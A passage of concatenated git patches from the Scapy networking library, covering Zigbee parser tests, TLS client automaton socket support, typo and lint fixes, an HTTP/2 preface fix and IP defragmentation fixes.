+assert pkt[ZigbeeAppDataPayload].src_endpoint == 0 +assert pkt[ZigbeeAppDataPayload].counter == 166 +assert raw(pkt[ZigbeeAppDataPayload].payload) == b'' + += Zigbee - ZDP command +pkt = ZigbeeAppDataPayload(b'\x08\x006\x00\x00\x00\x00\xb5\x01\x14\x01') +assert ZigbeeAppDataPayload in pkt.layers() +assert pkt[ZigbeeAppDataPayload].aps_frametype == 0 +assert pkt[ZigbeeAppDataPayload].delivery_mode == 2 +assert pkt[ZigbeeAppDataPayload].frame_control == 0b0000 +assert pkt[ZigbeeAppDataPayload].dst_endpoint == 0 +assert pkt[ZigbeeAppDataPayload].cluster == 0x0036 +assert pkt[ZigbeeAppDataPayload].profile == 0x0000 +assert pkt[ZigbeeAppDataPayload].src_endpoint == 0 +assert pkt[ZigbeeAppDataPayload].counter == 181 +assert ZigbeeDeviceProfile in pkt.layers() +assert raw(pkt[ZigbeeDeviceProfile]) == b'\x01\x14\x01' + += Zigbee - ZCL command +pkt = ZigbeeAppDataPayload(b'@\x01\n\x00\x04\x01\x01\x9d\x00\x00\x00\x00\x00') +assert ZigbeeAppDataPayload in pkt.layers() +assert pkt[ZigbeeAppDataPayload].aps_frametype == 0 +assert pkt[ZigbeeAppDataPayload].delivery_mode == 0 +assert pkt[ZigbeeAppDataPayload].frame_control == 0b0100 +assert pkt[ZigbeeAppDataPayload].dst_endpoint == 1 +assert pkt[ZigbeeAppDataPayload].cluster == 0x000a +assert pkt[ZigbeeAppDataPayload].profile == 0x0104 +assert pkt[ZigbeeAppDataPayload].src_endpoint == 1 +assert pkt[ZigbeeAppDataPayload].counter == 157 +assert ZigbeeClusterLibrary in pkt.layers() +assert raw(pkt[ZigbeeClusterLibrary]) == b'\x00\x00\x00\x00\x00' From 9e3a77a28e35ceda70739473c08a514b45afa06e Mon Sep 17 00:00:00 2001 From: gpotter Date: Wed, 20 May 2020 12:28:25 +0200 Subject: [PATCH 0168/1632] Apply guedou's comment --- doc/scapy/usage.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index ec453aa511a..a5c1763cf27 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1700,7 +1700,7 @@ Scapy dissects slowly and/or misses packets under heavy loads. .. note:: - Please bare in mind that Scapy is not designed to be blazing fast, but rather easily hackable & extensible. The packet model makes it VERY easy to create new layers, compared to pretty much all other alternatives, but comes with a performance cost. Of course, we still do our best to make Scapy as fast as possible, but it's not the absolute main goal. Just a quick disclaimer + Please bare in mind that Scapy is not designed to be blazing fast, but rather easily hackable & extensible. The packet model makes it VERY easy to create new layers, compared to pretty much all other alternatives, but comes with a performance cost. Of course, we still do our best to make Scapy as fast as possible, but it's not the absolute main goal. Solution ^^^^^^^^ From 4a95a7a135dfe1cb267c653eed1cf97436041a93 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 6 Apr 2020 16:29:07 +0000 Subject: [PATCH 0169/1632] Unrelated generate_ethertypes fixes --- scapy/tools/generate_ethertypes.py | 21 ++++++++++++++++----- 1 file changed, 16 insertions(+), 5 deletions(-) diff --git a/scapy/tools/generate_ethertypes.py b/scapy/tools/generate_ethertypes.py index 47c38c4f973..2a93d734e5a 100644 --- a/scapy/tools/generate_ethertypes.py +++ b/scapy/tools/generate_ethertypes.py @@ -4,8 +4,8 @@ # Copyright (C) Gabriel Potter # This program is published under a GPLv2 license -"""Generate the ethertypes file (/etc/ethertypes) -based on the OpenBSD source. +"""Generate the ethertypes file (/etc/ethertypes) based on the OpenBSD source +https://github.com/openbsd/src/blob/master/sys/net/ethertypes.h It allows to have a file with the format of http://git.netfilter.org/ebtables/plain/ethertypes @@ -33,10 +33,16 @@ # ... #Comment # """ +ALIASES = { + b"IP": b"IPv4", + b"IPV6": b"IPv6" +} + for line in DATA.split(b"\n"): match = re.match(reg, line) if match: - name = match.group(1).ljust(16) + name = match.group(1) + name = ALIASES.get(name, name).ljust(16) number = match.group(2).upper() comment = match.group(3).strip() compiled_line = (b"%b%b" + b" " * 25 + b"# %b\n") % ( @@ -44,5 +50,10 @@ ) COMPILED += compiled_line -with open("ethertypes", "wb") as output: - print("Written: %s" % output.write(COMPILED)) +with open("../libs/ethertypes.py", "rb") as inp: + data = inp.read() + +with open("../libs/ethertypes.py", "wb") as out: + ini, sep, _ = data.partition(b"DATA = b\"\"\"") + COMPILED = ini + sep + b"\n" + COMPILED + b"\"\"\"\n" + print("Written: %s" % out.write(COMPILED)) From a12d359df132e85ed9e0058e25d09512acfb86ca Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 14 May 2020 14:55:17 +0200 Subject: [PATCH 0170/1632] Add TLSClientAutomaton socket support --- scapy/automaton.py | 2 ++ scapy/layers/inet.py | 5 ++- scapy/layers/netflow.py | 4 +-- scapy/layers/tls/automaton.py | 27 +++++++++++---- scapy/layers/tls/automaton_cli.py | 55 ++++++++++++++++++++++++++----- scapy/layers/tls/automaton_srv.py | 4 +++ scapy/sendrecv.py | 3 +- scapy/sessions.py | 34 +++++++++++++++---- test/tls/tests_tls_netaccess.uts | 19 +++++++++++ 9 files changed, 128 insertions(+), 25 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 8900bb6ade1..1686038855b 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -427,6 +427,7 @@ def __init__(self, name, ioevent, automaton, proto, *args, **kargs): # Register recv hook self.spb.register_hook(self.call_release) kargs["external_fd"] = {ioevent: (self.spa, self.spb)} + kargs["is_atmt_socket"] = True self.atmt = automaton(*args, **kargs) self.atmt.runbg() @@ -730,6 +731,7 @@ def __init__(self, *args, **kargs): external_fd = kargs.pop("external_fd", {}) self.send_sock_class = kargs.pop("ll", conf.L3socket) self.recv_sock_class = kargs.pop("recvsock", conf.L2listen) + self.is_atmt_socket = kargs.pop("is_atmt_socket", False) self.started = threading.Lock() self.threadid = None self.breakpointed = None diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index cc99f05f724..6c553f1ce7f 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1703,6 +1703,9 @@ class TCP_client(Automaton): >>> a = TCP_client.tcplink(HTTP, "www.google.com", 80) >>> a.send(HTTPRequest()) >>> a.recv() + + :param ip: the ip to connect to + :param port: """ def parse_args(self, ip, port, *args, **kargs): from scapy.sessions import TCPSession @@ -1714,7 +1717,7 @@ def parse_args(self, ip, port, *args, **kargs): self.src = self.l4.src self.sack = self.l4[TCP].ack self.rel_seq = None - self.rcvbuf = TCPSession(self._transmit_packet, False) + self.rcvbuf = TCPSession(prn=self._transmit_packet, store=False) bpf = "host %s and host %s and port %i and port %i" % (self.src, self.dst, self.sport, diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 329b5876839..e08a55eb3a8 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -1547,8 +1547,8 @@ class NetflowSession(IPSession): """Session used to defragment NetflowV9/10 packets on the flow. See help(scapy.layers.netflow) for more infos. """ - def __init__(self, *args): - IPSession.__init__(self, *args) + def __init__(self, *args, **kwargs): + IPSession.__init__(self, *args, **kwargs) self.definitions = {} self.definitions_opts = {} self.ignored = set() diff --git a/scapy/layers/tls/automaton.py b/scapy/layers/tls/automaton.py index 30f6ba6a39f..0d593410879 100644 --- a/scapy/layers/tls/automaton.py +++ b/scapy/layers/tls/automaton.py @@ -7,6 +7,8 @@ The _TLSAutomaton class provides methods common to both TLS client and server. """ +import select +import socket import struct from scapy.automaton import Automaton @@ -63,6 +65,8 @@ class _TLSAutomaton(Automaton): def parse_args(self, mycert=None, mykey=None, **kargs): + self.verbose = kargs.pop("verbose", True) + super(_TLSAutomaton, self).parse_args(**kargs) self.socket = None @@ -83,8 +87,6 @@ def parse_args(self, mycert=None, mykey=None, **kargs): else: self.mykey = None - self.verbose = kargs.get("verbose", True) - def get_next_msg(self, socket_timeout=2, retry=2): """ The purpose of the function is to make next message(s) available in @@ -105,7 +107,6 @@ def get_next_msg(self, socket_timeout=2, retry=2): # A message is already available. return - self.socket.settimeout(socket_timeout) is_sslv2_msg = False still_getting_len = True grablen = 2 @@ -133,15 +134,27 @@ def get_next_msg(self, socket_timeout=2, retry=2): if grablen == len(self.remain_in): break + final = False try: - tmp = self.socket.recv(grablen - len(self.remain_in)) + tmp, _, _ = select.select([self.socket], [], [], + socket_timeout) if not tmp: retry -= 1 else: - self.remain_in += tmp - except Exception: - self.vprint("Could not join host ! Retrying...") + data = tmp[0].recv(grablen - len(self.remain_in)) + if not data: + # Socket peer was closed + self.vprint("Peer socket closed !") + final = True + else: + self.remain_in += data + except Exception as ex: + if not isinstance(ex, socket.timeout): + self.vprint("Could not join host (%s) ! Retrying..." % ex) retry -= 1 + else: + if final: + raise self.SOCKET_CLOSED() if len(self.remain_in) < 2 or len(self.remain_in) != grablen: # Remote peer is not willing to respond diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 7ff76a3a972..66e45b03a22 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -10,11 +10,29 @@ We support versions SSLv2 to TLS 1.3, along with many features. -In order to run a client to tcp/50000 with one cipher suite of your choice: -> from scapy.all import * -> ch = TLSClientHello(ciphers=) -> t = TLSClientAutomaton(dport=50000, client_hello=ch) -> t.run() +In order to run a client to tcp/50000 with one cipher suite of your choice:: + + from scapy.layers.tls import * + ch = TLSClientHello(ciphers=) + t = TLSClientAutomaton(dport=50000, client_hello=ch) + t.run() + +You can also use it as a SuperSocket using the ``tlslink`` io:: + + from scapy.layers.tls import * + a = TLSClientAutomaton.tlslink(Raw, server="scapy.net", dport=443) + a.send(HTTP()/HTTPRequest()) + while True: + a.recv() + +You can also use the io with a TCPSession, e.g. to get an HTTPS answer:: + + from scapy.all import * + from scapy.layers.http import * + from scapy.layers.tls import * + a = TLSClientAutomaton.tlslink(HTTP, server="www.google.com", dport=443) + pkt = a.sr1(HTTP()/HTTPRequest(), session=TCPSession(app=True), + timeout=2) """ from __future__ import print_function @@ -26,7 +44,7 @@ from scapy.config import conf from scapy.pton_ntop import inet_pton from scapy.utils import randstring, repr_hex -from scapy.automaton import ATMT +from scapy.automaton import ATMT, select_objects from scapy.error import warning from scapy.layers.tls.automaton import _TLSAutomaton from scapy.layers.tls.basefields import _tls_version, _tls_version_options @@ -187,6 +205,10 @@ def INITIAL(self): self.vprint("Starting TLS client automaton.") raise self.INIT_TLS_SESSION() + @ATMT.ioevent(INITIAL, name="tls", as_supersocket="tlslink") + def _socket(self, fd): + pass + @ATMT.state() def INIT_TLS_SESSION(self): self.cur_session = tlsSession(connection_end="client") @@ -565,7 +587,16 @@ def add_ClientData(self): Special characters are handled so that it becomes a valid HTTP request. """ if not self.data_to_send: - data = six.moves.input().replace('\\r', '\r').replace('\\n', '\n').encode() # noqa: E501 + if self.is_atmt_socket: + # Socket mode + fd = select_objects([self.ioin["tls"]], 0) + if fd: + self.add_record() + self.add_msg(TLSApplicationData(data=fd[0].recv())) + raise self.ADDED_CLIENTDATA() + raise self.WAITING_SERVERDATA() + else: + data = six.moves.input().replace('\\r', '\r').replace('\\n', '\n').encode() # noqa: E501 else: data = self.data_to_send.pop() if data == b"quit": @@ -618,7 +649,11 @@ def should_handle_ServerData(self): raise self.WAIT_CLIENTDATA() p = self.buffer_in[0] if isinstance(p, TLSApplicationData): - print("> Received: %r" % p.data) + if self.is_atmt_socket: + # Socket mode + self.oi.tls.send(p.data) + else: + print("> Received: %r" % p.data) elif isinstance(p, TLSAlert): print("> Received: %r" % p) raise self.CLOSE_NOTIFY() @@ -1357,6 +1392,10 @@ def TLS13_SENT_CLIENTFLIGHT2(self): self.vprint("You may send data or use 'quit'.") raise self.WAIT_CLIENTDATA() + @ATMT.state() + def SOCKET_CLOSED(self): + raise self.FINAL() + @ATMT.state(final=True) def FINAL(self): # We might call shutdown, but it may happen that the server diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index cd04b420a24..ddefdbaac2f 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -209,6 +209,10 @@ def BIND(self): raise self.FINAL() raise self.WAITING_CLIENT() + @ATMT.state() + def SOCKET_CLOSED(self): + raise self.WAITING_CLIENT() + @ATMT.state() def WAITING_CLIENT(self): self.buffer_out = [] diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 024266f52e9..bf8d129ce29 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -826,7 +826,8 @@ def _run(self, # instantiate session if not isinstance(session, DefaultSession): session = session or DefaultSession - session = session(prn, store, *session_args, **session_kwargs) + session = session(prn=prn, store=store, + *session_args, **session_kwargs) else: session.prn = prn session.store = store diff --git a/scapy/sessions.py b/scapy/sessions.py index 905cc3f5a92..dd27c4bc615 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -195,23 +195,45 @@ def tcp_reassemble(cls, data, metadata): return None A (hard to understand) example can be found in scapy/layers/http.py + + :param app: Whether the socket is on application layer = has no TCP + layer. Default to False """ fmt = ('TCP {IP:%IP.src%}{IPv6:%IPv6.src%}:%r,TCP.sport% > ' + '{IP:%IP.dst%}{IPv6:%IPv6.dst%}:%r,TCP.dport%') - def __init__(self, *args, **kwargs): + def __init__(self, app=False, *args, **kwargs): super(TCPSession, self).__init__(*args, **kwargs) - # The StringBuffer() is used to build a global - # string from fragments and their seq nulber - self.tcp_frags = defaultdict( - lambda: (StringBuffer(), {}) - ) + self.app = app + if app: + self.data = b"" + self.metadata = {} + else: + # The StringBuffer() is used to build a global + # string from fragments and their seq nulber + self.tcp_frags = defaultdict( + lambda: (StringBuffer(), {}) + ) def _process_packet(self, pkt): """Process each packet: matches the TCP seq/ack numbers to follow the TCP streams, and orders the fragments. """ + if self.app: + # Special mode: Application layer. Use on top of TCP + pay_class = pkt.__class__ + if not hasattr(pay_class, "tcp_reassemble"): + # Cannot tcp-reassemble + return pkt + self.data += bytes(pkt) + pkt = pay_class.tcp_reassemble(self.data, self.metadata) + if pkt: + self.data = b"" + self.metadata = {} + return pkt + return + from scapy.layers.inet import IP, TCP if not pkt or TCP not in pkt: return pkt diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 8cbb4b55a2f..93d711da3e1 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -346,3 +346,22 @@ test_tls_client("1305", "0304", key_update=True) ~ crypto_advanced test_tls_client("1305", "0304", client_auth=True, sess_in_out=True) + +# Automaton as Socket tests + ++ TLSAutomatonClient socket tests +~ netaccess + += Connect to google.com + +load_layer("tls") +load_layer("http") + +def _test_connection(): + a = TLSClientAutomaton.tlslink(HTTP, server="www.google.com", dport=443, + server_name="www.google.com") + pkt = a.sr1(HTTP()/HTTPRequest(), session=TCPSession(app=True), timeout=2, retry=3) + assert HTTPResponse in pkt + assert b"" in pkt[HTTPResponse].load + +retry_test(_test_connection) From 68f643faafa53c8d243343a05be1d2846f003089 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sat, 23 May 2020 00:48:57 -0400 Subject: [PATCH 0171/1632] Fix flake8 error --- scapy/contrib/gtp_v2.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 367e34d9e47..ce221aa4054 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1391,13 +1391,13 @@ class IE_FQCSID(gtp.IE_Base): BitField("num_csid", 0, 4), ConditionalField( IPField("nodeid_v4", 0), - lambda pkt: pkt.nodeid_type is 0), + lambda pkt: pkt.nodeid_type == 0), ConditionalField( XBitField("nodeid_v6", "2001:db8:0:42::", 128), - lambda pkt: pkt.nodeid_type is 1), + lambda pkt: pkt.nodeid_type == 1), ConditionalField( BitField("nodeid_nonip", 0, 32), - lambda pkt: pkt.nodeid_type is 2), + lambda pkt: pkt.nodeid_type == 2), ShortField("csid", 0)] From 964e09fe999ac2f493960a17e47b66d6e5e8c6e5 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Sat, 23 May 2020 11:55:38 +0200 Subject: [PATCH 0172/1632] Fix codespell errors (new version) --- .config/codespell_ignore.txt | 4 +++- scapy/contrib/eigrp.py | 5 +++-- scapy/contrib/opc_da.py | 2 +- scapy/layers/ppi.py | 2 +- scapy/layers/tls/cert.py | 2 +- scapy/libs/winpcapy.py | 2 +- test/regression.uts | 4 ++-- 7 files changed, 12 insertions(+), 9 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 03b2a822adf..1aaaa05c76c 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -4,11 +4,14 @@ archtypes ba cace cas +cros doas doubleclick eventtypes fo +gost iff +inout mitre nd negociate @@ -23,4 +26,3 @@ vas wan wanna webp -gost diff --git a/scapy/contrib/eigrp.py b/scapy/contrib/eigrp.py index fc6e11b7cdd..d91b3152381 100644 --- a/scapy/contrib/eigrp.py +++ b/scapy/contrib/eigrp.py @@ -279,8 +279,9 @@ def i2repr(self, pkt, x): def h2i(self, pkt, x): """The field accepts string values like v12.1, v1.1 or integer values. - String values have to start with a "v" folled by a floating point number. - Valid numbers are between 0 and 255. + String values have to start with a "v" followed by a + floating point number. Valid numbers are between 0 and 255. + """ if isinstance(x, str) and x.startswith("v") and len(x) <= 8: diff --git a/scapy/contrib/opc_da.py b/scapy/contrib/opc_da.py index 887d0d99a22..6d064601c57 100644 --- a/scapy/contrib/opc_da.py +++ b/scapy/contrib/opc_da.py @@ -684,7 +684,7 @@ def extract_padding(self, p): return b"", p -# Next version adapte the type with one PDU +# Next version adapts the type with one PDU class AttributeNameLE(Packet): name = "Attribute" fields_desc = [ diff --git a/scapy/layers/ppi.py b/scapy/layers/ppi.py index 3b11a20e6d5..749b467fd1b 100644 --- a/scapy/layers/ppi.py +++ b/scapy/layers/ppi.py @@ -22,7 +22,7 @@ A method for adding metadata to link-layer packets. -For example, one can tag an 802.11 packet with GPS co-ordinates of where it +For example, one can tag an 802.11 packet with GPS coordinates of where it was captured, and include it in the PCAP file. New PPI types should: diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 2a156e71c90..8f5d80401f8 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -68,7 +68,7 @@ @conf.commands.register def der2pem(der_string, obj="UNKNOWN"): """Convert DER octet string to PEM format (with optional header)""" - # Encode a byte string in PEM format. Header advertizes type. + # Encode a byte string in PEM format. Header advertises type. pem_string = ("-----BEGIN %s-----\n" % obj).encode() base64_string = base64.b64encode(der_string) chunks = [base64_string[i:i + 64] for i in range(0, len(base64_string), 64)] # noqa: E501 diff --git a/scapy/libs/winpcapy.py b/scapy/libs/winpcapy.py index 8d50121588c..c246f0dcea9 100644 --- a/scapy/libs/winpcapy.py +++ b/scapy/libs/winpcapy.py @@ -714,7 +714,7 @@ class pcap_send_queue(Structure): ("buffer", c_char_p)] # struct pcap_rmtauth - # This structure keeps the information needed to autheticate the user on a + # This structure keeps the information needed to authenticate the user on a # remote machine class pcap_rmtauth(Structure): _fields_ = [("type", c_int), diff --git a/test/regression.uts b/test/regression.uts index 26cdc97ee79..ba852d86d42 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -881,7 +881,7 @@ r in ['0x800 64 0x07b 4', 'IPv4 64 0x07b 4'] = sprintf() function ~ basic sprintf IP TCP SNAP LLC Dot11 -* This test is on the conditionnal substring feature of sprintf() +* This test is on the conditional substring feature of sprintf() a=Dot11()/LLC()/SNAP()/IP()/TCP() r = a.sprintf("{IP:{TCP:flags=%TCP.flags%}{UDP:port=%UDP.ports%} %IP.src%}") r @@ -7618,7 +7618,7 @@ assert len(pkts) == 15 # Verify a split header exists in the packet assert pkts[5].User_Agent == b'example_user_agent' -# Verify all of the resonse data exists in the packet +# Verify all of the response data exists in the packet assert int(pkts[7][HTTP].Content_Length.decode()) == len(pkts[7][Raw].load) = HTTP build From df894d75c6ad83511518b9aad67f39a85a6cf79b Mon Sep 17 00:00:00 2001 From: tim124058 Date: Mon, 25 May 2020 06:31:02 -0400 Subject: [PATCH 0173/1632] Fix http2 PREFACE --- scapy/contrib/http2.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index d7a744fb441..b2021549ba2 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -35,7 +35,7 @@ from io import BytesIO import struct import scapy.modules.six as six -from scapy.compat import raw, plain_str, bytes_hex, orb, chb, bytes_encode +from scapy.compat import raw, plain_str, hex_bytes, orb, chb, bytes_encode # Only required if using mypy-lang for static typing # Most symbols are used in mypy-interpreted "comments". @@ -2123,7 +2123,7 @@ def guess_payload_class(self, payload): # HTTP/2 Connection Preface # # noqa: E501 # From RFC 7540 par3.5 -H2_CLIENT_CONNECTION_PREFACE = bytes_hex('505249202a20485454502f322e300d0a0d0a534d0d0a0d0a') # noqa: E501 +H2_CLIENT_CONNECTION_PREFACE = hex_bytes('505249202a20485454502f322e300d0a0d0a534d0d0a0d0a') # noqa: E501 ############################################################################### From 9e23eac046ebd3e9a60d9bc4f6351e2ad87cb283 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 25 May 2020 21:22:04 +0200 Subject: [PATCH 0174/1632] Extend the missfrag list instead of appending --- scapy/layers/inet.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 6c553f1ce7f..55bc27660a7 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1024,7 +1024,7 @@ def _defrag_list(lst, defrag, missfrag): p = lst[0] lastp = lst[-1] if p.frag > 0 or lastp.flags.MF: # first or last fragment missing - missfrag.append(lst) + missfrag.extend(lst) return p = p.copy() if conf.padding_layer in p: @@ -1039,7 +1039,7 @@ def _defrag_list(lst, defrag, missfrag): if clen != q.frag << 3: # Wrong fragmentation offset if clen > q.frag << 3: warning("Fragment overlap (%i > %i) %r || %r || %r" % (clen, q.frag << 3, p, txt, q)) # noqa: E501 - missfrag.append(lst) + missfrag.extend(lst) break if q[IP].len is None or q[IP].ihl is None: clen += len(q[IP].payload) From 7f43aaaed18f81528d2acee1ecc7ba5e7bfe1a97 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 26 May 2020 11:16:59 +0200 Subject: [PATCH 0175/1632] Test defragment() with incomplete fragments --- test/regression.uts | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/test/regression.uts b/test/regression.uts index ba852d86d42..0f7f7cf991f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7817,6 +7817,10 @@ assert defrags[0].time == last_time nonfrag, defrags, badfrag = defrag(frags) assert defrags[0].time == last_time += defragment() - Missing fragments + +pkts = fragment(IP(dst="10.0.0.5")/ICMP()/("X"*1500)) +assert len(defragment(pkts[1:])) == 1 = defrag() / defragment() - Real DNS packets From 59a4303963825d6173a38a23f236178253263182 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 26 May 2020 15:56:31 +0200 Subject: [PATCH 0176/1632] Do not use fragment as variable name --- test/regression.uts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index 0f7f7cf991f..5744d0e4235 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7808,8 +7808,8 @@ payloadlen, fragsize = 100, 8 assert fragsize % 8 == 0 packet = Ether()/IP()/("X" * payloadlen) frags = fragment(packet, fragsize) -for i,fragment in enumerate(frags): - fragment.time -= 100 + i +for i,frag in enumerate(frags): + frag.time -= 100 + i last_time = max(frag.time for frag in frags) defrags = defragment(frags) From 207a70018a125224bccccd2e033b5bed55218af5 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Tue, 26 May 2020 20:55:05 +0200 Subject: [PATCH 0177/1632] Fix tlslink test google.com sometimes redirects to oblivion when not specifying the host --- test/tls/tests_tls_netaccess.uts | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 93d711da3e1..5a029a85197 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -360,7 +360,8 @@ load_layer("http") def _test_connection(): a = TLSClientAutomaton.tlslink(HTTP, server="www.google.com", dport=443, server_name="www.google.com") - pkt = a.sr1(HTTP()/HTTPRequest(), session=TCPSession(app=True), timeout=2, retry=3) + pkt = a.sr1(HTTP()/HTTPRequest(Host="www.google.com"), + session=TCPSession(app=True), timeout=2, retry=3) assert HTTPResponse in pkt assert b"" in pkt[HTTPResponse].load From 9b3bef2b6b10fb130c6e08bd55d293ff466af133 Mon Sep 17 00:00:00 2001 From: gpotter Date: Tue, 26 May 2020 23:01:01 +0200 Subject: [PATCH 0178/1632] Add TODO to TLS --- scapy/layers/tls/__init__.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/scapy/layers/tls/__init__.py b/scapy/layers/tls/__init__.py index 15f8ef29437..ae84d9792fa 100644 --- a/scapy/layers/tls/__init__.py +++ b/scapy/layers/tls/__init__.py @@ -62,6 +62,10 @@ - About the automatons: + - Allow upgrade from TLS 1.2 to TLS 1.3 in the Automaton client. + Currently we'll use TLS 1.3 only if the automaton client was given + version="tls13". + - Add various checks for discrepancies between client and server. Is the ServerHello ciphersuite ok? What about the SKE params? Etc. From dfd778c78cf54a91b9592ef701fbd18ca13f5986 Mon Sep 17 00:00:00 2001 From: gpotter Date: Tue, 26 May 2020 23:01:43 +0200 Subject: [PATCH 0179/1632] Better handling of errors --- scapy/layers/tls/automaton_cli.py | 29 ++++++++++++----------------- test/tls/example_client.py | 5 +++++ 2 files changed, 17 insertions(+), 17 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 66e45b03a22..8449ec8bb29 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -42,7 +42,6 @@ import time from scapy.config import conf -from scapy.pton_ntop import inet_pton from scapy.utils import randstring, repr_hex from scapy.automaton import ATMT, select_objects from scapy.error import warning @@ -112,20 +111,10 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, mykey=mykey, **kargs) tmp = socket.getaddrinfo(server, dport) - try: - if ':' in server: - inet_pton(socket.AF_INET6, server) - else: - inet_pton(socket.AF_INET, server) - except Exception: - remote_name = socket.getfqdn(server) - if remote_name != server: - tmp = socket.getaddrinfo(remote_name, dport) - - self.remote_name = server_name self.remote_family = tmp[0][0] self.remote_ip = tmp[0][4][0] self.remote_port = dport + self.server_name = server_name self.local_ip = None self.local_port = None self.socket = None @@ -304,9 +293,9 @@ def should_add_ClientHello(self): if self.cur_session.advertised_tls_version == 0x0303: ext += [TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsa"])] # Add TLS_Ext_ServerName - if self.remote_name: + if self.server_name: ext += TLS_Ext_ServerName( - servernames=[ServerName(servername=self.remote_name)] + servernames=[ServerName(servername=self.server_name)] ) p.ext = ext self.add_msg(p) @@ -1091,9 +1080,9 @@ def tls13_should_add_ClientHello(self): ext += TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss", "sha256+rsa"]) # Add TLS_Ext_ServerName - if self.remote_name: + if self.server_name: ext += TLS_Ext_ServerName( - servernames=[ServerName(servername=self.remote_name)] + servernames=[ServerName(servername=self.server_name)] ) p.ext = ext self.add_msg(p) @@ -1146,7 +1135,13 @@ def tls13_should_handle_HelloRetryRequest(self): @ATMT.condition(TLS13_RECEIVED_SERVERFLIGHT1, prio=3) def tls13_should_handle_AlertMessage_(self): self.raise_on_packet(TLSAlert, - self.CLOSE_NOTIFY) + self.TLS13_HANDLED_ALERT_FROM_SERVERFLIGHT1) + + @ATMT.state() + def TLS13_HANDLED_ALERT_FROM_SERVERFLIGHT1(self): + self.vprint("Received Alert message !") + self.vprint(self.cur_pkt.mysummary()) + raise self.CLOSE_NOTIFY() @ATMT.condition(TLS13_RECEIVED_SERVERFLIGHT1, prio=4) def tls13_missing_ServerHello(self): diff --git a/test/tls/example_client.py b/test/tls/example_client.py index c6792dd942a..efc18540f5d 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -63,6 +63,11 @@ if not v: sys.exit("Unrecognized TLS version option.") +try: + socket.getaddrinfo(args.server, args.port) +except socket.error as ex: + sys.exit("Could not resolve host server: %s" % ex) + if args.ciphersuite: ciphers = int(args.ciphersuite, 16) if ciphers not in list(range(0x1301, 0x1306)): From 751d795b541bd6a05e115612b1c5f0b35b004e11 Mon Sep 17 00:00:00 2001 From: gpotter Date: Tue, 26 May 2020 23:01:53 +0200 Subject: [PATCH 0180/1632] Fix TLS typo --- scapy/layers/tls/record.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index 32fb5e1eb6b..09866823bb9 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -781,7 +781,7 @@ class TLSAlert(_GenericTLSSessionInheritance): ByteEnumField("descr", None, _tls_alert_description)] def mysummary(self): - return self.sprintf("Alert %level%: %desc%") + return self.sprintf("Alert %level%: %descr%") def post_dissection_tls_session_update(self, msg_str): pass From bcced15bc1d782c96caf7d2937d6df9e354b3981 Mon Sep 